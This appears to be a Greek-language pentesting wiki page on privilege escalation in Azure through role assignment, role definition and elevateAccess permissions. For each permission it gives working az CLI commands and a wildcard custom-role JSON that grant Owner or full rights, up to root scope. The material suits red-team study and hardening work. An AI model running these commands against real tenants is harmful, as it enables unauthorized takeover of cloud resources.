Az - Azure IAM Privesc (Authorization)

Azure IAM

Για περισσότερες πληροφορίες ελέγξτε:

Microsoft.Authorization/roleAssignments/write

Αυτή η άδεια επιτρέπει την ανάθεση ρόλων σε κύριους σε μια συγκεκριμένη περιοχή, επιτρέποντας σε έναν επιτιθέμενο να κλιμακώσει τα προνόμια του αναθέτοντας στον εαυτό του έναν πιο προνομιακό ρόλο:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Αυτή η άδεια επιτρέπει την τροποποίηση των αδειών που χορηγούνται από έναν ρόλο, επιτρέποντας σε έναν επιτιθέμενο να κλιμακώσει τα προνόμια χορηγώντας περισσότερες άδειες σε έναν ρόλο που έχει αναθέσει.

Δημιουργήστε το αρχείο role.json με το εξής περιεχόμενο:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

Τότε ενημερώστε τις άδειες ρόλου με τον προηγούμενο ορισμό καλώντας:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Αυτή η άδεια επιτρέπει την αναβάθμιση των δικαιωμάτων και την ικανότητα ανάθεσης αδειών σε οποιονδήποτε κύριο για πόρους Azure. Προορίζεται να δοθεί στους Παγκόσμιους Διαχειριστές Entra ID ώστε να μπορούν επίσης να διαχειρίζονται τις άδειες στους πόρους Azure.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"